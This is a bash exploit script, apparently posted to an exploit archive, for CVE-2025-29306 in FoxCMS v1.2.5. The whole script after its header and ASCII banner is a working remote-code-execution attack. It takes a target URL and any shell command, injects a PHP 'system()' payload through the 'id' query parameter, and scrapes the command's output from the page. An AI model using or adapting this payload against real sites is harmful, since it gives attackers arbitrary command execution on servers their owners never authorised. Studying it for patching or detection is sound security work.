# Date: 2025-04-17 # Exploit Title: # Exploit Author: VeryLazyTech # Vendor Homepage: https://www.foxcms.org/ # Software Link: https://www.foxcms.cn/ # Version: FoxCMS v.1.2.5 # Tested on: Ubuntu 22.04, Windows Server 2019 # CVE: CVE-2025-29306 # Website: https://www.verylazytech.com #!/bin/bash banner() { cat <<'EOF' ______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __ / ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_ | | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \ | |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) | \____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/ __ __ _ _____ _ \ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__ \ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \ \ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | | \_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_| |___/ |___/ @VeryLazyTech - Medium EOF } # Call the banner function banner set -e # Check for correct number of arguments if [ "$#" -ne 2 ]; then printf "Usage: $0 <url> <command>" exit 1 fi TARGET=$1 # Encode payload ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))") FULL_URL="${TARGET}?id=${ENCODED_CMD}" echo "[*] Sending RCE payload: $2" HTML=$(curl -s "$FULL_URL") # Extract <ul> from known XPath location using xmllint UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null) # Strip tags, clean up CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//') echo echo "[+] Command Output:" echo "$CLEANED"